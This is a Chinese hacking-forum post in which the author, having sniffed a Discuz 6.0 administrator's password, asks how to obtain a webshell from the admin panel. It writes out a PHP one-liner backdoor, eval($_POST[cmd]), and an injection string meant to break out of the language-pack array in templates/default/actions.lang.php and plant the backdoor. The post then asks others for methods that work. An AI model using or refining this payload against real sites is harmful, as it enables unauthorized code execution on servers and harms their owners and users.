[讨论]关于discuz6.0后台获取shell的方法 shell, 后台, 获取, 讨论

s37su37

[讨论]关于discuz6.0后台获取shell的方法
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
议题作者：NEVErSayLovE

   如题, 通过嗅探获得了admin的密码,进了后台,在获取shell这一步出了问题.
   按照一般的说法是在模版管理里编辑语言包actions.随便找一行写入"eval($_POST[cmd]); "(没有引号).提交就写入templates/default/actions.lang.php了,但是我有客户端连接的时候没有反应.
排除一句话和url写错.
    在网上找了下,说法是在最后一行-即游客一行写入
复制内容到剪贴板
代码:
游客\');?>
<?php eval($_POST[cmd]);?><?$languagex= array (
\&#39;g\&#39;=>\&#39;error
依然无果.再次编辑时可以看到游客后面的那个"\"被去掉了.
请问一下大家在discuz6.0后台一般都是怎样得shell的啊,还望不吝赐教.

帖子38 精华2 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 查看详细资料引用 报告 回复 TOP 赚更多的钱


neversaylove
晶莹剔透§烈日灼然